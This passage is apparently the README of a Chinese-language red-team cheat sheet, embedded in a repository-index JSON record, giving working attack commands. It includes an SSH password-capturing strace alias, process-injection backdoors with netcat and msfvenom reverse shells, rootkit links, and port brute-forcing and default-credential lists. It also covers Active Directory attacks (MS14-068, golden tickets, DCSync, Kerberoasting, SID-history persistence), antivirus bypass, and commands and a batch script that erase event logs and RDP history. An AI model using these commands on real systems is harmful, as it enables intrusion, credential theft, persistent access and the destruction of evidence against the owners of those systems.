TCP4:192.168.206.142:22,sourceport=13377\n```\n##### SSH keylogger \nvim当前用户下的.bashrc文件,末尾添加\n```\n#!bash\nalias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'\n```\nsource .bashrc\n##### Cymothoa_进程注入backdoor \n```\n./cymothoa -p 2270 -s 1 -y 7777\n```\n```\nnc -vv ip 7777\n```\n##### Vegile_进程注入backdoor\n\n```bash\nmsfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f elf -o /tmp/backdoor\n```\n\n```bash\n# 进程注入\nVegile --i /tmp/backdoor\n# 无限重启\nVegile --u /tmp/backdoor\n```\n\n##### rootkit\n\n* [openssh_rootkit](http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz)\n* [Kbeast_rootkit ](http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz)\n* Mafix + Suterusu rootkit\n\n##### Tools\n\n* [Vegile ](https://github.com/Screetsec/Vegile)\n* [backdoor ](https://github.com/icco/backdoor)\n\n### WEB后门\n\nPHP Meterpreter后门 \nAspx Meterpreter后门 \nweevely \nwebacoo \n....\n\n## 横向渗透\n### 端口渗透 \n#### 端口扫描 \n* 1.端口的指纹信息(版本信息) \n* 2.端口所对应运行的服务 \n* 3.常见的默认端口号 \n* 4.尝试弱口令 \n\n#### 端口爆破 \n* [hydra](https://github.com/vanhauser-thc/thc-hydra)\n* [Crowbar](https://github.com/galkan/crowbar) -- OpenVPN/RDP/SSH/VNC\n* [PortBrute](https://github.com/awake1t/PortBrute) -- 爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD (Go语言编写,跨平台支持)\n\n#### 端口弱口令 \n* NTScan \n* Hscan \n* 自写脚本 \n\n#### 端口溢出 \n**smb**\n* ms08067 \n* ms17010 \n* ms11058 \n* ... \n\n**apache**\n**ftp** \n**...**\n\n#### 常见的默认端口 \n##### 1. web类(web漏洞/敏感目录) \n第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix ...\n```\n80 web \n80-89 web \n8000-9090 web \n```\n##### 2. 数据库类(扫描弱口令) \n```\n1433 MSSQL \n1521 Oracle \n3306 MySQL \n5432 PostgreSQL \n50000 DB2\n```\n##### 3. 特殊服务类(未授权/命令执行类/漏洞) \n```\n443 SSL心脏滴血 \n445 ms08067/ms11058/ms17010等 \n873 Rsync未授权 \n5984 CouchDB http://xxx:5984/_utils/ \n6379 redis未授权 \n7001,7002 WebLogic默认弱口令,反序列 \n9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 \n11211 memcache未授权访问 \n27017,27018 Mongodb未授权访问 \n50000 SAP命令执行 \n50070,50030 hadoop默认端口未授权访问 \n```\n##### 4. 常用端口类(扫描弱口令/端口爆破) \n\n```\n21 ftp \n22 SSH \n23 Telnet \n445 SMB弱口令扫描 \n2601,2604 zebra路由,默认密码zebra \n3389 远程桌面 \n5800,5801,5900,5901 VNC\n```\n\n##### 5. 端口合计所对应的服务 \n```\n21 ftp \n22 SSH \n23 Telnet \n25 SMTP \n53 DNS \n69 TFTP \n80 web \n80-89 web \n110 POP3 \n135 RPC \n139 NETBIOS \n143 IMAP \n161 SNMP \n389 LDAP \n443 SSL心脏滴血以及一些web漏洞测试 \n445 SMB \n512,513,514 Rexec \n873 Rsync未授权 \n1025,111 NFS \n1080 socks \n1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案 \n1433 MSSQL (暴力破解) \n1521 Oracle:(iSqlPlus Port:5560,7778) \n2082/2083 cpanel主机管理系统登陆 (国外用较多) \n2222 DA虚拟主机管理系统登陆 (国外用较多) \n2601,2604 zebra路由,默认密码zebra \n3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 \n3306 MySQL (暴力破解) \n3312/3311 kangle主机管理系统登陆 \n3389 远程桌面 (RDP)\n3690 svn \n4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 \n4848 GlassFish web中间件 弱口令:admin/adminadmin \n5432 PostgreSQL \n5900 vnc \n5984 CouchDB http://xxx:5984/_utils/ \n6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 \n6379 redis未授权 \n7001,7002 WebLogic默认弱口令,反序列 \n7778 Kloxo主机控制面板登录 \n8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 \n8080 tomcat/WDCd/ 主机管理系统,默认弱口令 \n8080,8089,9090 JBOSS \n8081 Symantec AV/Filter for MSE \n8083 Vestacp主机管理系统 (国外用较多) \n8649 ganglia \n8888 amh/LuManager 主机管理系统默认端口 \n9000 fcgi fcig php执行 \n9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager \n9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 \n10000 Virtualmin/Webmin 服务器虚拟主机管理系统 \n11211 memcache未授权访问 \n27017,27018 Mongodb未授权访问 \n28017 mongodb统计页面 \n50000 SAP命令执行 \n50060 hadoop \n50070,50030 hadoop默认端口未授权访问\n```\n### 域渗透 \n#### 信息搜集 \n##### powerview.ps1 \n```\nGet-NetDomain - gets the name of the current user's domain\nGet-NetForest - gets the forest associated with the current user's domain\nGet-NetForestDomains - gets all domains for the current forest\nGet-NetDomainControllers - gets the domain controllers for the current computer's domain\nGet-NetCurrentUser - gets the current [domain\\]username\nGet-NetUser - returns all user objects, or the user specified (wildcard specifiable)\nGet-NetUserSPNs - gets all user ServicePrincipalNames\nGet-NetOUs - gets data for domain organization units\nGet-NetGUIDOUs - finds domain OUs linked to a specific GUID\nInvoke-NetUserAdd - adds a local or domain user\nGet-NetGroups - gets a list of all current groups in the domain\nGet-NetGroup - gets data for each user in a specified domain group\nGet-NetLocalGroups - gets a list of localgroups on a remote host or hosts\nGet-NetLocalGroup - gets the members of a localgroup on a remote host or hosts\nGet-NetLocalServices - gets a list of running services/paths on a remote host or hosts\nInvoke-NetGroupUserAdd - adds a user to a specified local or domain group\nGet-NetComputers - gets a list of all current servers in the domain\nGet-NetFileServers - get a list of file servers used by current domain users\nGet-NetShare - gets share information for a specified server\nGet-NetLoggedon - gets users actively logged onto a specified server\nGet-NetSessions - gets active sessions on a specified server\nGet-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles\nGet-NetConnections - gets active connections to a specific server resource (share)\nGet-NetFiles - gets open files on a server\nGet-NetProcesses - gets the remote processes and owners on a remote server\n```\n##### BloodHound\n\n**获取某OU下所有机器信息**\n```\n{\n \"name\": \"Find the specificed OU computers\",\n \"queryList\": [\n {\n \"final\": false,\n \"title\": \"Select a OU...\",\n \"query\": \"MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC\"\n },\n {\n \"final\": true,\n \"query\": \"MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]-\u003e(n:Computer) RETURN p\",\n \"allowCollapse\": true,\n \"endNode\": \"{}\"\n }\n ]\n }\n```\n\n**自动标记owned用户及机器**\n\n[SyncDog](https://github.com/Lz1y/SyncDog)\n\n\n##### 获取域内DNS信息\n* [adidnsdump](https://github.com/dirkjanm/adidnsdump)\n* [域渗透——DNS记录的获取](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96/)\n* 在DNS服务器上download所有记录之后可以使用[dns-zonefile](https://github.com/elgs/dns-zonefile)将txt导出为json结果\n \n#### 获取域控的方法 \n##### SYSVOL \nSYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO. Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 \n相关阅读: \n* [寻找SYSVOL里的密码和攻击GPP(组策略偏好) ](http://www.freebuf.com/vuls/92016.html)\n* [Windows Server 2008 R2之四管理Sysvol文件夹 ](http://blog.51cto.com/ycrsjxy/203095)\n* [SYSVOL中查找密码并利用组策略首选项 ](https://adsecurity.org/?p=2288)\n* [利用SYSVOL还原组策略中保存的密码](https://xz.aliyun.com/t/1653) \n\n##### MS14-068 Kerberos \n```\npython ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机\n```\n利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书:\n```\nmimikatz.exe \"kerberos::ptc c:TGT_darthsidious@pentest.com.ccache\" exit\nnet use k: \\pentest.comc$\n```\n相关阅读 :\n* [Kerberos的工具包PyKEK](http://adsecurity.org/?p=676) \n* [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html)\n* [Kerberos的安全漏洞](https://adsecurity.org/?p=541) \n\n##### SPN扫描 \nKerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。\nSPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。\nSPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。\n相关阅读 :\n* [非扫描式的SQL Server发现](https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/) \n* [SPN扫描](https://adsecurity.org/?p=1508) \n* [扫描SQLServer的脚本](https://github.com/PyroTek3/PowerShell-AD-Recon) \n\n##### Kerberos的黄金门票 \n在域上抓取的哈希\n```\nlsadump::dcsync /domain:pentest.com /user:krbtgt\n```\n```\nkerberos::purge\nkerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi\nkerberos::ptt administrator.kiribi\nkerberos::tgt\nnet use k: \\pnet use k: \\pentest.comc$\n```\n相关阅读 :\n* https://adsecurity.org/?p=1640 \n* [域服务账号破解实践](http://bobao.360.cn/learning/detail/3564.html) \n* [Kerberos的认证原理](https://blog.csdn.net/wulantian/article/details/42418231) \n* [深刻理解windows安全认证机制ntlm&Kerberos](https://klionsec.github.io/2016/08/10/ntlm-kerberos/) \n\n##### Kerberos的银票务\n黄金票据和白银票据的一些区别:\nGolden Ticket:伪造`TGT`,可以获取`任何Kerberos`服务权限\n银票:伪造TGS,`只能访问指定的服务`\n加密方式不同:\nGolden Ticket由`krbtgt`的hash加密\nSilver Ticket由`服务账号`(通常为计算机账户)Hash加密\n认证流程不同:\n金票在使用的过程需要同域控通信\n银票在使用的过程不需要同域控通信\n相关阅读 :\n* [攻击者如何使用Kerberos的银票来利用系统](https://adsecurity.org/?p=2011) \n* [域渗透——Pass The Ticket](https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf)\n\n##### 域服务账号破解 \n与上面SPN扫描类似的原理\nhttps://github.com/nidem/kerberoast\n获取所有用作SPN的帐户\n```\nsetspn -T PENTEST.com -Q */*\n```\n从Mimikatz的RAM中提取获得的门票\n```\nkerberos::list /export\n```\n用rgsrepcrack破解\n```\ntgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi\n```\n##### 凭证盗窃 \n从搜集的密码里面找管理员的密码 \n\n##### NTLM relay\n * [One API call away from Domain Admin](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/)\n * [privexchange](https://github.com/dirkjanm/privexchange/)\n * [Exchange2domain](https://github.com/ridter/exchange2domain)\n\n##### Kerberos委派\n * [Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)\n * [s4u2pwnage](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\n * [Attacking Kerberos Delegation](https://xz.aliyun.com/t/2931)\n * [用打印服务获取域控](https://adsecurity.org/?p=4056)\n * [Computer Takeover](https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/)\n * [Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/)\n * [CVE-2019-1040](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)\n\n##### 地址解析协议 \n实在搞不定再搞ARP \n​ \n#### 获取AD哈希 \n* 使用VSS卷影副本 \n* Ntdsutil中获取NTDS.DIT​​文件 \n* PowerShell中提取NTDS.DIT --\u003e[Invoke-NinaCopy ](https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy)\n* 使用Mimikatz提取 \n\n```\nmimikatz lsadump::lsa /inject exit \n```\n* 使用PowerShell Mimikatz\n* 使用Mimikatz的DCSync 远程转储Active Directory凭证\n提取 KRBTGT用户帐户的密码数据:\n\n```\nMimikatz \"privilege::debug\" \"lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt\"exit\n```\n管理员用户帐户提取密码数据:\n```\nMimikatz \"privilege::debug\" \"lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator\" exit\n\n```\n* NTDS.dit中提取哈希 \n使用esedbexport恢复以后使用ntdsxtract提取 \n\n#### AD持久化 \n##### 活动目录持久性技巧 \nhttps://adsecurity.org/?p=1929 \nDS恢复模式密码维护 \nDSRM密码同步 \n\u003eWindows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)\n\n[DCshadow ](https://www.dcshadow.com/)\n\n##### Security Support Provider \n简单的理解为SSP就是一个DLL,用来实现身份认证\n```\nprivilege::debug\nmisc::memssp\n```\n这样就不需要重启`c:/windows/system32`可看到新生成的文件kiwissp.log\n##### [SID History](https://adsecurity.org/?p=1772) \nSID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户\n```\nmimikatz \"privilege::debug\" \"misc::addsid bobafett ADSAdministrator\"\n```\n##### [AdminSDHolder&SDProp ](https://adsecurity.org/?p=1906)\n利用AdminSDHolder&SDProp(重新)获取域管理权限 \n##### 组策略 \nhttps://adsecurity.org/?p=2716 \n[策略对象在持久化及横向渗透中的应用](https://www.anquanke.com/post/id/86531) \n##### Hook PasswordChangeNotify \nhttp://www.vuln.cn/6812\n\n##### Kerberoasting后门\n[域渗透-Kerberoasting](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/)\n\n##### AdminSDHolder\n[Backdooring AdminSDHolder for Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)\n\n##### Delegation\n[Unconstrained Domain Persistence](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence)\n\n#### 其他\n##### 域内主机提权\n[SharpAddDomainMachine](https://github.com/Ridter/SharpAddDomainMachine\n)\n##### Exchange的利用\n* [**Exchange2domain**](https://github.com/Ridter/Exchange2domain)\n* [**CVE-2018-8581**](https://github.com/WyAtu/CVE-2018-8581/)\n* [**CVE-2019-1040**](https://github.com/Ridter/CVE-2019-1040) \n* [**CVE-2020-0688**](https://github.com/Ridter/CVE-2020-0688)\n* [**NtlmRelayToEWS**](https://github.com/Arno0x/NtlmRelayToEWS)\n* [**ewsManage**](https://github.com/3gstudent/ewsManage)\n\n#### TIPS \n[《域渗透——Dump Clear-Text Password after KB2871997 installed》](https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed)\n\n[《域渗透——Hook PasswordChangeNotify》](http://www.vuln.cn/6812) \n\u003e可通过Hook PasswordChangeNotify实时记录域控管理员的新密码 \n\n[《域渗透——Local Administrator Password Solution》 ](http://www.liuhaihua.cn/archives/179102.html)\n\u003e域渗透时要记得留意域内主机的本地管理员账号 \n\n[《域渗透——利用SYSVOL还原组策略中保存的密码》 ](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/)\n\n#### 相关工具 \n* [BloodHound ](https://github.com/BloodHoundAD/BloodHound)\n* [CrackMapExec ](https://github.com/byt3bl33d3r/CrackMapExec)\n* [DeathStar](https://github.com/byt3bl33d3r/DeathStar) \n \n \u003e利用过程:http://www.freebuf.com/sectool/160884.html \n\n### 在远程系统上执行程序 \n* At \n* Psexec \n* WMIC \n* Wmiexec \n* Smbexec \n* Powershell remoting \n* DCOM \n* [Winrm](https://github.com/Hackplayers/evil-winrm)\n* [SharpWmi](https://github.com/QAX-A-Team/sharpwmi) -- 基于135端口来进行横向移动的工具,具有执行命令和上传文件功能\n* [goWMIExec](https://github.com/C-Sto/goWMIExec) -- 纯golang实现,可以在linux环境下进行,不需要impacket的支持\n\n### IOT相关 \n* 1. 路由器 [routersploit ](https://github.com/reverse-shell/routersploit)\n* 2. 打印机 [PRET ](https://github.com/RUB-NDS/PRET)\n* 3. IOT exp https://www.exploitee.rs/\n* 4. 相关 \n[OWASP-Nettacker](https://www.owasp.org/index.php/OWASP_Nettacker)\n[isf](https://github.com/dark-lbp/isf) \n[icsmaster](https://github.com/w3h/icsmaster)\n\n### 中间人 \n* [Cain](http://www.oxid.it/cain.html) \n* [Ettercap](https://github.com/Ettercap/ettercap) \n* [Responder](https://github.com/SpiderLabs/Responder) \n* [MITMf](https://github.com/byt3bl33d3r/MITMf) \n* [3r/MITMf)](https://github.com/evilsocket/bettercap) \n \n### 规避杀软及检测 \n#### Bypass Applocker \n[UltimateAppLockerByPassList ](https://github.com/api0cradle/UltimateAppLockerByPassList)\nhttps://lolbas-project.github.io/ \n\n#### bypassAV \n* Empire \n* PEspin \n* Shellter \n* Ebowla \n* Veil \n* PowerShell \n* Python \n* [代码注入技术Process Doppelgänging ](http://www.4hou.com/technology/9379.html)\n* [Disable-Windows-Defender](https://github.com/NYAN-x-CAT/Disable-Windows-Defender)\n* ...\n\n## 痕迹清理\n### [Windows日志清除](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/) \n获取日志分类列表:\n```\nwevtutil el \u003e1.txt\n```\n获取单个日志类别的统计信息:\neg.\n\n```\nwevtutil gli \"windows powershell\"\n```\n回显:\n```\ncreationTime: 2016-11-28T06:01:37.986Z\nlastAccessTime: 2016-11-28T06:01:37.986Z\nlastWriteTime: 2017-08-08T08:01:20.979Z\nfileSize: 1118208\nattributes: 32\nnumberOfLogRecords: 1228\noldestRecordNumber: 1\n```\n查看指定日志的具体内容:\n```\nwevtutil qe /f:text \"windows powershell\"\n```\n删除单个日志类别的所有信息:\n```\nwevtutil cl \"windows powershell\"\n```\n### 破坏Windows日志记录功能 \n利用工具 \n* [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m) \n* [Windwos-EventLog-Bypass](https://github.com/3gstudent/Windwos-EventLog-Bypass) \n* [Phant0m | Windows Event Log Killer]()\n\n### msf \n```\nrun clearlogs \n```\n```\nclearev \n```\n### 3389登陆记录清除 \n```\n@echo off\n@reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\n@del \"%USERPROFILE%\\My Documents\\Default.rdp\" /a\n@exit\n```\n\n","funding_links":[],"categories":["Others"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets/lists"}